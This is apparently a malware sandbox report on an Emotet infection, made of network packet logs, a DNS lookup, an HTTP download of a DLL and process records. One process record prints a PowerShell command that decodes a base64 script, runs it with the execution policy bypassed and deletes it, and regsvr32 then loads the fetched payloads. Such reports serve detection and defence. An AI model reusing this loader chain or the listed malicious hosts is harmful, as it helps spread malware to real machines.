                                                                                                                                                                                  Apr 26, 2022 09:46:25.173163891 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173187971 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173213005 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173269987 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173356056 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173408031 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231297016 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231359959 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231400013 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231476068 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231508970 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231626987 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.231709003 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296827078 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296888113 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296904087 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296977043 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.296994925 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.297036886 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.297169924 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.297236919 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.346607924 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.346669912 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.346710920 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.347053051 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.347243071 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393440008 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393500090 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393521070 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393620014 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393681049 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393738985 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393810034 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.393867016 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460781097 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460843086 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460887909 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460900068 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460936069 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.460942030 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.461072922 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.461148024 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.542867899 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.542917013 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.542998075 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543067932 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543080091 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543164968 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543338060 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.543426037 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622102976 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622180939 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622188091 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622242928 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622246027 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622306108 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622400999 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.622596979 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.711987019 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712052107 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712096930 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712127924 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.712182045 CEST8049747166.62.28.147192.168.2.3
Apr 26, 2022 09:46:25.712227106 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.712235928 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.712241888 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.775639057 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.775701046 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.775768042 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.775799990 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.775809050 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.775957108 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.776042938 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.776128054 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.827733040 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.827800989 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.827871084 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.827913046 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.828038931 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.828100920 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.828248024 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.828321934 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.868046045 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.868087053 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.868175030 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.868226051 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.868310928 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.868417025 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.868581057 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.868877888 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.912647009 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.912698030 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.912786007 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.912837982 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.912906885 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.913023949 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.913085938 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.913177967 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.963274956 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.963363886 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.963380098 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.963593006 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.963653088 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.963669062 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:25.963848114 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:25.967037916 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.019526958 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.019610882 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.019618034 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.019665003 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.019848108 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.019951105 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.020073891 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.022224903 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.102833033 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.102890015 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.102941036 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.102965117 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.103085995 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.103132963 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.103147984 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.103219032 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.180556059 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.180655956 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.180727959 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.180742979 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.180788994 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.180795908 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.180886030 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.181153059 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.229222059 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.229274035 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.229309082 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.229342937 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.229545116 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.229796886 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.230927944 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.279706955 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.279733896 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.279750109 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.279763937 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.279829025 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.279865026 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.327749968 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.327825069 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.327857971 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.327868938 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.327908993 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.327979088 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.373739004 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.373794079 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.373850107 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.373903990 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.373910904 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.373939037 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.410108089 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.410147905 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.410197020 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.410226107 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.410253048 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.410303116 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.462759972 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.462821007 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.462860107 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.462876081 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.462946892 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.462954044 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.463052034 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.463198900 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.518039942 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.518095016 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.518132925 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.518153906 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.518188953 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.518201113 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.518205881 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.518264055 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.562444925 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.562500000 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.562541008 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.562576056 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.562582970 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.562619925 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.562627077 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.562632084 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.601100922 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.601166010 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.601241112 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.601283073 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.601408005 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.601450920 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.601484060 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.601541996 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:26.758311987 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:26.758392096 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:29.602402925 CEST  80     49747  166.62.28.147   192.168.2.3
Apr 26, 2022 09:46:29.602878094 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:34.415591955 CEST  49747  80     192.168.2.3     166.62.28.147
Apr 26, 2022 09:46:56.833834887 CEST  49756  8080   192.168.2.3     138.201.142.73
Apr 26, 2022 09:46:56.856914997 CEST  8080   49756  138.201.142.73  192.168.2.3
Apr 26, 2022 09:46:56.860356092 CEST  49756  8080   192.168.2.3     138.201.142.73
Apr 26, 2022 09:46:56.891932011 CEST  49756  8080   192.168.2.3     138.201.142.73
Apr 26, 2022 09:46:56.914777994 CEST  8080   49756  138.201.142.73  192.168.2.3
Apr 26, 2022 09:46:56.933388948 CEST  8080   49756  138.201.142.73  192.168.2.3
Apr 26, 2022 09:46:56.933442116 CEST  8080   49756  138.201.142.73  192.168.2.3
Apr 26, 2022 09:46:56.933497906 CEST  49756  8080   192.168.2.3     138.201.142.73
Apr 26, 2022 09:46:58.844877005 CEST  49756  8080   192.168.2.3     138.201.142.73
Apr 26, 2022 09:46:58.868572950 CEST  8080   49756  138.201.142.73  192.168.2.3
Apr 26, 2022 09:46:58.868748903 CEST  49756  8080   192.168.2.3     138.201.142.73
Apr 26, 2022 09:46:58.874234915 CEST  49756  8080   192.168.2.3     138.201.142.73
Apr 26, 2022 09:46:58.939033985 CEST  8080   49756  138.201.142.73  192.168.2.3
Apr 26, 2022 09:46:59.403727055 CEST  8080   49756  138.201.142.73  192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:59.403817892 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:47:02.405256987 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:47:02.405313969 CEST808049756138.201.142.73192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:47:02.405428886 CEST497568080192.168.2.3138.201.142.73
                                                                                                                                                                                  Apr 26, 2022 09:47:02.405487061 CEST497568080192.168.2.3138.201.142.73
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Apr 26, 2022 09:46:22.610363960 CEST  57723        53         192.168.2.3  8.8.8.8
Apr 26, 2022 09:46:22.626599073 CEST  53           57723      8.8.8.8      192.168.2.3
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class
Apr 26, 2022 09:46:22.610363960 CEST  192.168.2.3  8.8.8.8  0x5dca    Standard query (0)  focusmedica.in  A (IP address)  IN (0x0001)
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name            CName  Address        Type            Class
Apr 26, 2022 09:46:22.626599073 CEST  8.8.8.8    192.168.2.3  0x5dca    No error (0)  focusmedica.in  -      166.62.28.147  A (IP address)  IN (0x0001)
• focusmedica.in

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.3  49747        166.62.28.147   80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp: Apr 26, 2022 09:46:23.079543114 CEST   kBytes transferred: 1073   Direction: OUT
Data:
GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: focusmedica.in
Connection: Keep-Alive

Timestamp: Apr 26, 2022 09:46:23.356245995 CEST   kBytes transferred: 1074   Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 26 Apr 2022 07:46:23 GMT
Server: Apache
X-Powered-By: PHP/7.3.33
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Tue, 26 Apr 2022 07:46:23 GMT
Content-Disposition: attachment; filename="EeL9HdVdV8PNPDkaAx3wjw.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 6267a34f2b816=1650959183; expires=Tue, 26-Apr-2022 07:47:23 GMT; Max-Age=60; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 26 Apr 2022 07:46:23 GMT
Content-Length: 473088
Keep-Alive: timeout=5
Content-Type: application/x-msdownload
Target ID: 0
Start time: 09:46:13
Start date: 26/04/2022
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
Imagebase: 0x7ff746f80000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 1
Start time: 09:46:13
Start date: 26/04/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 09:46:18
Start date: 26/04/2022
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
Imagebase: 0x7ff746f80000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 6
Start time: 09:46:27
Start date: 26/04/2022
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq
Imagebase: 0x7ff6420c0000
File size: 24064 bytes
MD5 hash: D78B75FC68247E8A63ACBA846182740E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.296664424.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID:7
Start time:09:46:31
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:8
Start time:09:46:33
Start date:26/04/2022
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc"
Imagebase:0x7ff6420c0000
File size:24064 bytes
MD5 hash:D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.518667146.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:9
Start time:09:46:33
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:10
Start time:09:46:35
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:11
Start time:09:46:36
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:12
Start time:09:46:36
Start date:26/04/2022
Path:C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\SgrmBroker.exe
Imagebase:0x7ff63a600000
File size:163336 bytes
MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:13
Start time:09:46:37
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:14
Start time:09:46:39
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff7c9170000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:16
Start time:09:46:45
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:17
Start time:09:46:47
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:18
Start time:09:47:08
Start date:26/04/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:20
Start time:09:47:18
Start date:26/04/2022
